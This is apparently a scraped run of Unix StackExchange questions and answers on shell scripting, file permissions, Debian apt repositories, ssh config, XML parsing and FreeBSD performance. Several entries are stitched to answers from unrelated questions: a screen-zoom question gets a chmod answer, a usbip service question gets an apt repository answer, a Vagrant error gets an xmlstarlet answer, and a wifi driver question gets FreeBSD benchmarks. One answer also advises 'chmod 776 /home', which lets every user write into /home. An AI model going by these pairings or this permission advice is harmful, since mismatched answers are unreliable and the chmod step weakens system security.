max=$((6*3600))$(($RANDOM%max/3600)) And in this formula, $RANDOM is a random value in the range 0-32767. RANDOM Each time this parameter is referenced, a random integer between 0 and 32767 is generated. It helps to visualize how this maps to possible values: 0 = 0-35991 = 3600-71992 = 7200-107993 = 10800-143994 = 14400-179995 = 18000-215990 = 21600-251991 = 25200-287992 = 28800-323993 = 32400-32767 So in your formula, the probability for 0, 1, 2 is twice that of 4, 5. And probability of 3 is slightly higher than 4, 5 too. Hence your result with 0, 1, 2 as winners and 4, 5 as losers. When changing to 9*3600 , it turns out as: 0 = 0-35991 = 3600-71992 = 7200-107993 = 10800-143994 = 14400-179995 = 18000-215996 = 21600-251997 = 25200-287998 = 28800-323990 = 32400-32767 1-8 have the same probability, but there is still a slight bias for 0, and hence 0 was still the winner in your test with 100'000 iterations. To fix the modulo bias, you should first simplify the formula (if you only want 0-5 then the modulo is 6, not 3600 or even crazier number, no sense in that). This simplification alone will reduce your bias by a lot (32766 maps to 0, 32767 to 1 giving a tiny bias to those two numbers). To get rid of bias altogether, you need to re-roll, (for example) when $RANDOM is lower than 32768 % 6 (eliminate the states that do not map perfectly to available random range). max=6for f in {1..100000}do r=$RANDOM while [ $r -lt $((32768 % $max)) ]; do r=$RANDOM; done echo $(($r%max))done | sort | uniq -c | sort -n Test result: 16425 5 16515 1 16720 0 16769 2 16776 4 16795 3 The alternative would be using a different random source that does not have noticable bias (orders of magnitude larger than just 32768 possible values). But implementing a re-roll logic anyway doesn't hurt (even if it likely never comes to pass). | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/528361",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/360809/"
]
} |
528,502 | this works as expected in bash: > t="ls -l"> $t #== ls -l> "$t" #== "ls -l"ls -l: command not found But in zsh I got this: > t="ls -l"> $t #== "ls -l"ls -l: command not found How can I force the shell to parse the variable value again like bash does? | If you want a variable that expands to more than one argument use an array: var=(ls -l)$var But to store code, the most obvious storage type is a function: myfunction() ls -l Or: myfunction() ls -l "$@" for that function to take extra arguments to be passed to ls . The fact that bash like most other Bourne-like shells splits unquoted variables upon expansion is IMO a bug. See the kind of problems it leads to . But if you want that behaviour, you can set the shwordsplit option. You could also add the globsubst option to restore another bug found in bash and other Bourne-like shells where variable expansion is also subject to globbing (aka pathname expansion). Or do the full shebang with emulate sh or emulate ksh (but lose a few more zsh features). Without having to go there, you can also tell zsh to explicitly split a variable: var='ls -l'$=var # split on $IFS like the $var of bash/sh${(s[ ])var} # split on spaces only regardless of the value of $IFS var='*.txt'echo $~var # do pathname expansion like the $var of bash/sh var='ls -ld -- *.txt'$=~var # do both word splitting and filename generation | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/528502",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/34965/"
]
} |
528,655 | I have a group called homeperms on an Ubuntu system, with a few users: $ cat /etc/group | grep "homeperms"homeperms:x:1004:jorik,tim.wijma,vanveenjorik,jorik_c And I've done $ sudo chgrp -R homeperms /home .But when I try to md /home/flask. I get a permission denied error (Happens with any other folder name too). I don't want to 777 the folders since I'm going to be dealing with web server stuff. Permissions of home in / drwxr-xr-x 12 vanveenjorik homeperms 4096 Jul 6 09:06 home permissions inside /home : drwxr-xr-x 6 vanveenjorik homeperms 4096 Jul 3 20:08 19150drwxr-xr-x 3 codeanywhere-ssh-key homeperms 4096 Jul 6 08:00 codeanywhere-ssh-keydrwxr-xr-x 2 vanveenjorik homeperms 4096 Jul 6 09:13 downloadsdrwxr-xr-x 5 vanveenjorik homeperms 4096 Jul 4 08:43 jorikdrwxr-xr-x 4 jorik_c homeperms 4096 Jul 6 08:09 jorik_cdrwxrwxr-x 4 vanveenjorik homeperms 4096 Jul 3 20:15 mkdir_pythondrwxr-xr-x 5 vanveenjorik homeperms 4096 Jul 4 09:09 tim.wijmadrwxr-xr-x 3 vanveenjorik homeperms 4096 Jul 3 18:20 ubuntudrwxr-xr-x 5 vanveenjorik homeperms 4096 Jul 4 09:27 vanveenjorikdrwxrwxr-x 3 vanveenjorik homeperms 4096 Jul 3 22:28 venvs I am trying to do this on the user 'jorik_c' and with sudo this (of course) works flawlessly Before this gets marked as duplicate, the answer to this question , didn't help. | By typing the command chgrp -R homeperms /home , You effectively changed the group ownership of /home and everything underneath to homeperms. BUT, the group still does not have WRITE access on the directory. Per your output: drwxr-xr-x 12 vanveenjorik homeperms 4096 Jul 6 09:06 home Remember, file permissions display as: OWNER, GROUP, EVERYONE ELSE You can fix it quickly by any of the following: # retaining (rewriting) your existing permissions + toggling the WRITE-ACCESS bit for GROUPchmod 776 /home# similar, accomplished the same but simplifiedchmod g+w /home | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528655",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/351927/"
]
} |
528,659 | I'd like to have the functionality described in this video . Basically, use super+scrollup/down or pinch in/out on my touchpad to zoom in a certain area of the screen like on a phone or tablet. Sadly I need compiz to get the described effect. How can I zoom in without using compiz? I'm using Arch Linux with bspwm + compton. What I've tried: xzoom , which can zoom but spawns a new window instead of zooming in on the spot. Not what I want. KDE's kmag , pretty much the same as xzoom but with a nice GUI. Magnifier , where you can mouse over an area to zoom that area of the screen, which is not really what I want. I want to actually zoom in the whole screen like in the video above. There's are open issues in compton's repositories: https://github.com/chjj/compton/issues/188 (dead repo) https://github.com/yshui/compton/issues/43 (new fork) | By typing the command chgrp -R homeperms /home , You effectively changed the group ownership of /home and everything underneath to homeperms. BUT, the group still does not have WRITE access on the directory. Per your output: drwxr-xr-x 12 vanveenjorik homeperms 4096 Jul 6 09:06 home Remember, file permissions display as: OWNER, GROUP, EVERYONE ELSE You can fix it quickly by any of the following: # retaining (rewriting) your existing permissions + toggling the WRITE-ACCESS bit for GROUPchmod 776 /home# similar, accomplished the same but simplifiedchmod g+w /home | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528659",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/302467/"
]
} |
528,679 | I have millions of files with the following nomenclature on a Linux machine: 1559704165_a1ac6f55fef555ee.jpg The first 10 digits are timestamp and the ones followed by a _ are specific ids. I want to move all the files matching specific filename ids to a different folder. I tried this on the directory with files find . -maxdepth 1 -type f | ??????????_a1ac*.jpg |xargs mv -t "/home/ubuntu/ntest" However I am getting an error indicating: bash 1559704165_a1ac6f55fef555ee.jpg: command not found When I tried, mv ??????????_a1ac*.jpg I am getting argument list too long error. I have atleast 15 different filename patterns. How do I move them. | You should use: find . -maxdepth 1 -type f -name '??????????_a1ac*.jpg' \-exec mv -t destination "{}" + So maxdepth 1 means that you want to search in current directory no subdirectories. type f means find only files. name '??????????_a1ac*.jpg' is a pattern that matches with file you are searching. mv -t destination "{}" + means move matched files to destination. Here + adds new matched files to previous one like: mv -t dest a b c d Here a b c d are different files. | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/528679",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/247049/"
]
} |
528,751 | I cannot run apt-get update as I encounter the following error: # apt-get updateHit:1 http://ftp.br.debian.org/debian testing InReleaseIgn:2 http://security.debian.org/debian-security testing/updates InReleaseErr:3 http://security.debian.org/debian-security testing/updates Release 404 Not Found [IP: 151.101.92.204 80]Reading package lists... DoneE: The repository 'http://security.debian.org/debian-security testing/updates Release' no longer has a Release file.N: Updating from such a repository can't be done securely, and is therefore disabled by default.N: See apt-secure(8) manpage for repository creation and user configuration details.E: Repository 'http://ftp.br.debian.org/debian testing InRelease' changed its 'Codename' value from 'buster' to 'bullseye'N: This must be accepted explicitly before updates for this repository can be applied. See apt-secure(8) manpage for details. So there are two error messages here: The repository no longer has a Release file, which is weird. I checked at http://security-cdn.debian.org/debian-security/zzz-dists/testing/updates/ ant it looks like the Release file is there. Am I looking in the wrong place or is there something else happening? The repository changed its name from buster to bullseye and that this "must be accepted explicitly" (I saw this once today; it wasn't there when I opened the question and it does not appear anymore). This isn't really surprising, but I didn't expect it to be a problem if I'm tracking the repository as testing instead of the release name. What can I do? APT is telling me to read the apt-secure(8) , but it either does not have the information I need or I cannot understand it. | Change testing/updates to testing-security in your sources.list to match http://security-cdn.debian.org/debian-security/dists/testing-security/ Then run apt update instead of apt-get update to interactively accept the various changes. According to this reddit post this repository name change was introduced in release 10. | {
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/528751",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/136742/"
]
} |
528,769 | I am looking to have a host start up and run usbip [Unit]Description=USB-IP BindingAfter=network-online.target[Service]ExecStartPre=/usr/sbin/usbipd -DExecStart=/usr/sbin/usbip bind --busid 1-1.5ExecStop=/usr/sbin/usbip unbind --busid 1-1.5Restart=on-failure [Install]WantedBy=default.target It appears to start correctly with out error, but when i go to the client and list the server it does not show that usbip running. Also does anyone know of a script to share all USB device via USBIP. Thank you for the help. | Change testing/updates to testing-security in your sources.list to match http://security-cdn.debian.org/debian-security/dists/testing-security/ Then run apt update instead of apt-get update to interactively accept the various changes. According to this reddit post this repository name change was introduced in release 10. | {
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/528769",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361175/"
]
} |
528,853 | I'm running an ubuntu image in a docker container, with my .ssh directory mounted from my native MacOs environment. My .ssh/config file contains Host * AddKeysToAgent yes UseKeychain yes IdentityFile ~/.ssh/id_ed25519_common This works fine on a mac, but AddKeysToAgent and UseKeychain are not valid for linux, and anything (e.g. git) that uses the openssh-client package won't just ignore the unrecognised directives, but fail and exit. Is there any way of having a .ssh/config file that will let me share it across mac and linux? | You can use the Match keyword in the ssh config file to restrict a portion of the configuration to only apply under certain conditions. For the excerpt in the question, something like the following should work: Host * AddKeysToAgent yes IdentityFile ~/.ssh/id_ed25519_commonMatch exec "uname -s | grep Darwin" UseKeychain yes On a linux system, the grep will return failure (1), and so the following line(s) will be ignored; on the Mac host, the grep will return success (0) and the UseKeychain yes line will be applied. The Match block is terminated by the next Match , Host , or end of file. Note that AddKeysToAgent is not platform-specific, but is available in OpenSSH since version 7.2, so presumably you are using an older version of OpenSSH in the Ubuntu container but not on the Mac host. | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/528853",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361232/"
]
} |
529,009 | I tried to upgrade my Debian System using apt , the repository is set to "testing" so I expected it to change to the next version "Bullseye" from "Buster" automatically but since "Buster" moved on I get: 404 Not Found [IP: 151.101.12.204 80] when running apt update . The security.debian.org address does not seem to have Release files, did the address change? E: The repository 'http://security.debian.org testing/updates Release' no longer has a Release file.N: Updating from such a repository can't be done securely, and is therefore disabled by default.N: See apt-secure(8) manpage for repository creation and user configuration details. this are the relevant entries of my /etc/apt/sources.list : deb http://ftp.ch.debian.org/debian/ testing main contrib non-freedeb-src http://ftp.ch.debian.org/debian/ testing main contrib non-freedeb http://security.debian.org/ testing/updates main contrib non-freedeb-src http://security.debian.org/ testing/updates main contrib non-free# jessie-updates, previously known as 'volatile'deb http://ftp.ch.debian.org/debian/ testing-updates main contrib non-freedeb-src http://ftp.ch.debian.org/debian/ testing-updates main contrib non-free I checked man apt-secure but could not find or understand the relevant information. Update: I got two answers so far, both referring to the ofical debian.org page, but suggest a complete different solution. Can someone please explain, since I decided to not remove the security.debian.org entries, but changed the version-attribute format. | From https://wiki.debian.org/Status/Testing deb http://security.debian.org testing-security main contrib non-freedeb-src http://security.debian.org testing-security main contrib non-free The entries slightly changed after the latest release. Here is an announcement to debian-devel-announce : ... over the last years we had people getting confused over -updates (recommended updates) and /updates (security updates). Starting with Debian 11 "bullseye" we have therefore renamed the suite including the security updates to -security. An entry in sources.list should look like deb security.debian.org/debian-security bullseye-security main For previous releases the name will not change. | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529009",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/240990/"
]
} |
529,012 | I am new to bash shell scripting, apologies if this was already asked. I have combinations of multiple files such as: USA.txt Florida.txt Miami.txt I would like to join those files and create a new file which contains everything such as: cat *.txt > USA_FLORIDA_MIAMI.txt In another case The thing is that some other time the files have a different prefix: Canada.txt Quebec.txt Montreal.txt so in this second case, the output will be CANADA_QUEBEC_MONTREAL.txt: cat *.txt > CANADA_QUEBEC_MONTREAL.txt and so on for all the combinations of other files In the first case scenario, USA.txt Florida.txt Miami.txt are the only .txt files present in the directory. In the second case, they will be replaced by Canada.txt Quebec.txt Montreal.txt so I would need to write a code which all the time combines the information of the prefix of all the .txt files present at that time in the directory and it adds it to the prefix of the output file. The variable here is the name of the Country, State and City. Any suggestion about any command which I could use?thanks | From https://wiki.debian.org/Status/Testing deb http://security.debian.org testing-security main contrib non-freedeb-src http://security.debian.org testing-security main contrib non-free The entries slightly changed after the latest release. Here is an announcement to debian-devel-announce : ... over the last years we had people getting confused over -updates (recommended updates) and /updates (security updates). Starting with Debian 11 "bullseye" we have therefore renamed the suite including the security updates to -security. An entry in sources.list should look like deb security.debian.org/debian-security bullseye-security main For previous releases the name will not change. | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529012",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361114/"
]
} |
529,063 | I have a file where each line contains a sentence where one word is found between the character > and <. For example: Martin went shopping at >Wallmart< and lost his walletFrench food >tastes< great I am looking for a command to run from the shell that will print the word inside ">" and "<" for every line. Thanks in advance. | What about grep ? grep -oP "(?<=\>).*(?=<)" file Output: Wallmarttastes EDIT: Following @Toby Speight comment, and assuming that between > and < there are only words, to avoid matching > and < in other contexts the command should be grep -oP "(?<=\>)\w+(?=<)" file | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529063",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/314584/"
]
} |
529,318 | From man tar : -f, --file ARCHIVE use archive file or device ARCHIVE Please consider: tar -zxvf myFile.tar.gz As far as I understand, z means "gzipped tarball", x means "extract", v means "verbose output" but about f I am not sure. If we already give the file name myFile.tar.gz , why is the f argument needed? | It's the option you use to specify the actual pathname of the archive you would want to work with, either for extracting from or for creating or appending to, etc. If you don't use -f archivename , different implementations of tar will behave differently (some may try to use a default device under /dev , the standard input or output stream, or the file/device specified by an environment variable). In the command line that you quote, tar -zxvf myFile.tar.gz which is the same as tar -z -x -v -f myFile.tar.gz you use this option with myFile.tar.gz as the option-argument to specify that you'd like to extract from a particular file in the current directory. Consult the manual for tar on your system to see what data stream or device the utility would use if you don't use the -f option. The GNU tar implementation, for example, has a --show-defaults option that will show the default options used by tar , and this will probably include the -f option (this default may be overridden by setting the TAPE environment variable). | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529318",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/-1/"
]
} |
529,342 | I just upgraded my server to Debian Buster (Raspbian). However, when I now boot, my USB hard drives aren't mounting. I see something like the following on my splash screen: mount: /media/PiHDD: can't find UUID=<string> If I manually sudo mount -a , then all hard drives are mounted The following is /etc/fstab : proc /proc proc defaults 0 0/dev/mmcblk0p1 /boot vfat defaults 0 0/dev/mmcblk0p2 / ext4 defaults,noatime 0 0UUID=<string> /media/PiHDD ext4 defaults,noatime 0 0UUID=<string2> /media/PiHDD2 ext4 defaults,noatime 0 0... which worked fine before the update to Buster. I've also tried identifying the hard drives using PARTUUID or LABEL , based on the output of blkid , but these also fail on boot with can't find LABEL , etc. I'm not using systemd (PID 1 is init, and file /sbin/init gives an executable). /sbin/init --version gives SysV init version: 2.93 . I've updated to the latest (testing) kernel 4.19.57-v7+ . On boot, I think my system is seeing the USB devices before it tries to mount them. I can see New USB device found before the mounting fails. I also see Attached SCSI disk after the device is found, but I'm not sure if it's before or after the failed mounting. This is all in /var/log/syslog , but for some reason the mount… can't find UUID errors that I see on boot are not in any file in /var/log . How can I get my system to automatically mount my USB hard drives on boot? Here are the contents of /etc/inittab . # /etc/inittab: init(8) configuration.# $Id: inittab,v 1.91 2002/01/25 13:35:21 miquels Exp $# The default runlevel.id:2:initdefault:# Boot-time system configuration/initialization script.# This is run first except when booting in emergency (-b) mode.si::sysinit:/etc/init.d/rcS# What to do in single-user mode.~~:S:wait:/sbin/sulogin# /etc/init.d executes the S and K scripts upon change# of runlevel.## Runlevel 0 is halt.# Runlevel 1 is single-user.# Runlevels 2-5 are multi-user.# Runlevel 6 is reboot.l0:0:wait:/etc/init.d/rc 0l1:1:wait:/etc/init.d/rc 1l2:2:wait:/etc/init.d/rc 2l3:3:wait:/etc/init.d/rc 3l4:4:wait:/etc/init.d/rc 4l5:5:wait:/etc/init.d/rc 5l6:6:wait:/etc/init.d/rc 6# Normally not reached, but fallthrough in case of emergency.z6:6:respawn:/sbin/sulogin# What to do when CTRL-ALT-DEL is pressed.ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now# Action on special keypress (ALT-UpArrow).#kb::kbrequest:/bin/echo "Keyboard Request--edit /etc/inittab to let this work."# What to do when the power fails/returns.pf::powerwait:/etc/init.d/powerfail startpn::powerfailnow:/etc/init.d/powerfail nowpo::powerokwait:/etc/init.d/powerfail stop# /sbin/getty invocations for the runlevels.## The "id" field MUST be the same as the last# characters of the device (after "tty").## Format:# <id>:<runlevels>:<action>:<process>## Note that on most Debian systems tty7 is used by the X Window System,# so if you want to add more getty's go ahead but skip tty7 if you run X.#1:2345:respawn:/sbin/getty --noclear 38400 tty1 2:23:respawn:/sbin/getty 38400 tty23:23:respawn:/sbin/getty 38400 tty34:23:respawn:/sbin/getty 38400 tty45:23:respawn:/sbin/getty 38400 tty56:23:respawn:/sbin/getty 38400 tty6# Example how to put a getty on a serial line (for a terminal)##T0:23:respawn:/sbin/getty -L ttyS0 9600 vt100#T1:23:respawn:/sbin/getty -L ttyS1 9600 vt100# Example how to put a getty on a modem line.##T3:23:respawn:/sbin/mgetty -x0 -s 57600 ttyS3#Spawn a getty on Raspberry Pi serial lineT0:23:respawn:/sbin/getty -L ttyAMA0 115200 vt100 | It's the option you use to specify the actual pathname of the archive you would want to work with, either for extracting from or for creating or appending to, etc. If you don't use -f archivename , different implementations of tar will behave differently (some may try to use a default device under /dev , the standard input or output stream, or the file/device specified by an environment variable). In the command line that you quote, tar -zxvf myFile.tar.gz which is the same as tar -z -x -v -f myFile.tar.gz you use this option with myFile.tar.gz as the option-argument to specify that you'd like to extract from a particular file in the current directory. Consult the manual for tar on your system to see what data stream or device the utility would use if you don't use the -f option. The GNU tar implementation, for example, has a --show-defaults option that will show the default options used by tar , and this will probably include the -f option (this default may be overridden by setting the TAPE environment variable). | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529342",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/18887/"
]
} |
529,379 | I have a bash script which simply docker pushes an image: docker push $CONTAINER_IMAGE:latest I want to loop for 3 times when this fails. How should I achieve this? | Use for-loop and && break : for n in {1..3}; do docker push $CONTAINER_IMAGE:latest && break;done break quits the loop, but only runs when docker push succeeded. If docker push fails, it will exit with error and the loop will continue. | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529379",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/62249/"
]
} |
529,471 | I have a machine that I access only via SSH that I just updated to Debian 10 a couple of days ago. Since the update it seems to be going to sleep when it is inactive. This has never happened with previous updates like from 7 to 8 or from 8 to 9. It seems like maybe the sleep settings have reverted to a default state. How can I view and edit the power and sleep settings in the command line? Any guidance much appreciated. Thanks! | you can try the following based on your needs: Disable suspend and hibernation: sudo systemctl mask sleep.target suspend.target hibernate.target hybrid-sleep.target To re-enable hibernate and suspend use the following command: sudo systemctl unmask sleep.target suspend.target hibernate.target hybrid-sleep.target If you just want to prevent suspending when the lid is closed you can set the following options in /etc/systemd/logind.conf : [Login]HandleLidSwitch=ignoreHandleLidSwitchDocked=ignore restart the service or reboot your machine systemctl restart systemd-logind.service | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/529471",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361788/"
]
} |
529,670 | Using Bash, File: <?xml version="1.0" encoding="UTF-8"?><blah> <blah1 path="er" name="andy" remote="origin" branch="master" tag="true" /> <blah1 path="er/er1" name="Roger" remote="origin" branch="childbranch" tag="true" /> <blah1 path="er/er2" name="Steven" remote="origin" branch="master" tag="true" /></blah> I have tried the following: grep -i 'name="andy" remote="origin" branch=".*\"' <filename> But it returns the whole line: <blah1 path="er" name="andy" remote="origin" branch="master" tag="true" /> I would like to match the line based on the following: name="andy" I just want it to return: master | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)$ echo $branchmaster | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529670",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361957/"
]
} |
529,679 | I have some non standard and standard filenames like the ones below . I need to get the count of files that are NOT standard.. Standard file names: XYZ ABC .txt, XYZ ABC .csv, *.msg Non standard file names: 989875.txt or myname.csv ; this has no bounds and can be anything.. The only good part is I know the standard one and i just need to do a NOT condition to simple find command. How can i do it. Not interested to do a file LOOP etc.. | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)$ echo $branchmaster | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529679",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361571/"
]
} |
529,696 | Just now: $ vagrant plugin updateUpdating installed plugins...Fetching public_suffix-3.1.1.gemFetching vagrant-lxd-0.4.2.gemTraceback (most recent call last): 19: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/bin/vagrant:182:in `<main>' 18: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/environment.rb:290:in `cli' 17: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/cli.rb:66:in `execute' 16: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/root.rb:66:in `execute' 15: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/update.rb:28:in `execute' 14: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/base.rb:14:in `action' 13: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/runner.rb:102:in `run' 12: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/util/busy.rb:19:in `busy' 11: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/runner.rb:102:in `block in run' 10: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/builder.rb:116:in `call' 9: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/warden.rb:50:in `call' 8: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/builtin/before_trigger.rb:23:in `call' 7: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/warden.rb:50:in `call' 6: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/action/update_gems.rb:23:in `call' 5: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/plugin/manager.rb:228:in `update_plugins' 4: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:242:in `clean' 3: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:242:in `each' 2: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:251:in `block in clean' 1: from /usr/lib/ruby/2.6.0/rubygems/uninstaller.rb:162:in `uninstall_gem'/usr/lib/ruby/2.6.0/rubygems/uninstaller.rb:264:in `remove': uninitialized constant Gem::RDoc (NameError) This or similar errors seem to happen every single time I update plugins in Vagrant. Is my system broken in some way? | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)$ echo $branchmaster | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529696",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/3645/"
]
} |
529,752 | Update They don't! At least, not for me. See my answer. Original question According to last year's Phoronix benchmarks , applications on FreeBSD mostly run slower than on Debian (including Stockfish chess engine, Node.js, FLAC encoding and other computational tasks). Phoronix article itself attributes some of the performance differences to use of Clang instead of GCC compiler. Some other opinions say that use of ZFS makes FreeBSD slower, as ZFS is inherently slower than ext4. But even purely computational tasks on FreeBSD compiled with GCC8 performed slower than on Linux. What is the cause of that? Is it inherent to differences between FreeBSD and Linux kernels, might it be caused by worse quality of drivers or is there some other reason? P.S. To make it more specific, here is a fairly simple purely computational program that runs slower on FreeBSD than on Linux according to Phoronix: m-queens 1.2 . Compiled like this: gcc -o m-queens.bin main.c -O2 -march=native -mtune=native -std=c99 -fopenmp Since this a multithreaded task that was run on two 20 core CPUs, I suspect the performance difference boils down to how well OS handles multiple threads. P.P.S. To make it more clear, I am aware that FreeBSD has good networking capabilities and that it is used by Netflix . The question is specifically about computational tasks, like the one above. P.P.P.S. After installing FreeBSD (TrueOS) on my 6-core desktop alongside Ubuntu and trying to run the queens benchmark myself, I didn't notice any significant difference in multithreaded performance. While Phoronix claims that it ran 39% slower on FreeBSD, in my tests it was only 3.7% slower, which could be attributed to slight difference in compiler version (gcc 7.4 on TrueOS, gcc 7.2 on Ubuntu). I will test more later. | So many downvotes stimulated me to install FreeBSD (TrueOS) on my 6-core desktop computer to test it myself. (NOTE: I do not recommend trying to install TrueOS alongside other operating systems, because this installation wiped one of my hard drives, even though I tried to install it on a USB drive... Not a user-friendly experience.) As a result, after running some tests from the Phoronix test suite on both Ubuntu and FreeBSD, I couldn't see the “slow applications on FreeBSD” effect. Quite the contrary, some applications ran significantly (10–25%) faster on FreeBSD : Test FreeBSD 13 Ubuntu 17Fhourstones, kpos/s 16753 13336m-queens, multithreaded, user time, s 18.08 17.387zip 1 GB text file, user time, s 994 1096 As you can see, the only task that performed slower on FreeBSD was multithreaded N queens problem, taking 3.7% more time than on Ubuntu. Potential pitfalls: gcc on Ubuntu was version 7.2, on FreeBSD – 7.4 Ubuntu was running with KDE, FreeBSD in a shell (shouldn't make much difference) Phoronix used 80-thread server, I used 6-thread Intel i5 computer. In conclusion, when testing OS performance, you should: run benchmarks on your setup yourself instead of trusting results that were obtained by someone else. try to use the same compiler. beware that performance of scripting languages like Perl and Python are not a good indicator of OS performance, since different installations of the interpreters behave differently. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529752",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/274235/"
]
} |
529,757 | I have built the linux distro Boot2Qt from source with the yocto tools for the board Colibri iMX6ULL which has the integrated wifi chip Marvell W8997-M1216 . I installed the whole linux firmware-stack and i think also the correct kernel modules for the wifi chip. There is no mlan interface showing up. What exactly creates the mlan interface? Is there something else i need to install? Edit: I also am thankful for general answers on what prerequisites a linux os needs to have functional wifi, and what software exactly creates a wireless interface. | So many downvotes stimulated me to install FreeBSD (TrueOS) on my 6-core desktop computer to test it myself. (NOTE: I do not recommend trying to install TrueOS alongside other operating systems, because this installation wiped one of my hard drives, even though I tried to install it on a USB drive... Not a user-friendly experience.) As a result, after running some tests from the Phoronix test suite on both Ubuntu and FreeBSD, I couldn't see the “slow applications on FreeBSD” effect. Quite the contrary, some applications ran significantly (10–25%) faster on FreeBSD : Test FreeBSD 13 Ubuntu 17Fhourstones, kpos/s 16753 13336m-queens, multithreaded, user time, s 18.08 17.387zip 1 GB text file, user time, s 994 1096 As you can see, the only task that performed slower on FreeBSD was multithreaded N queens problem, taking 3.7% more time than on Ubuntu. Potential pitfalls: gcc on Ubuntu was version 7.2, on FreeBSD – 7.4 Ubuntu was running with KDE, FreeBSD in a shell (shouldn't make much difference) Phoronix used 80-thread server, I used 6-thread Intel i5 computer. In conclusion, when testing OS performance, you should: run benchmarks on your setup yourself instead of trusting results that were obtained by someone else. try to use the same compiler. beware that performance of scripting languages like Perl and Python are not a good indicator of OS performance, since different installations of the interpreters behave differently. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529757",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/362008/"
]
} |
529,786 | I read many articles on the internet about how to install a program on Linux, for example Ubuntu, but I'm still confused! What I understand 'till now is: First, we should add repository that contains our intended package. In Ubuntu, it will be done by un-commenting the related line in /etc/apt/sources.list file. Then we should update our repository's package list by executing apt-get update . at the end, install our program by executing apt install . ... but still I can't understand! When we un-comment a repository in sources.list , does that mean that we tell the OS: "download this repository on my computer"? Is it needed that repository be downloaded at all? If not, so what happen in the system by un-commenting a line in sources.list? What exactly apt-get update does? as I read : apt-get update downloads the package lists from the repositories and"updates" them to get information on the newest versions of packages and their dependencies. What does that mean exactly? We have a repository with some packages; does that means that some repositories may be out of date? So why instead they don't update repositories on the server that would be always up to date and nobody need to do apt-get update ? | When we un-comment a repository in sources.list , does that mean that we tell the OS: "download this repository on my computer"? No. Is it needed that repository be downloaded at all? Not usually. Unless you want to download possibly hundreds of gigabytes. If not, so what happen in the system by un-commenting a line in sources.list? Nothing much, yet . We have a repository, it has some packages, does that means that some repositories may be out of date? Repositories can be out of date, yes, but that's not what's being talked about here. So why instead they don't update repositories on the server that would be always up to date and nobody need to do apt-get update? It doesn't quite work that way. What happens is this: Repositories contain packages, true, but they also contain information about those packages (metadata): package names, versions, dependencies of the packages, list of files that the packages contain, hashes of the packages and so on. apt-get update downloads this metadata. apt-get install , upgrade , etc. then uses this metadata when you tell it to install a package - it checks available versions, checks whether additional packages needed to installed as 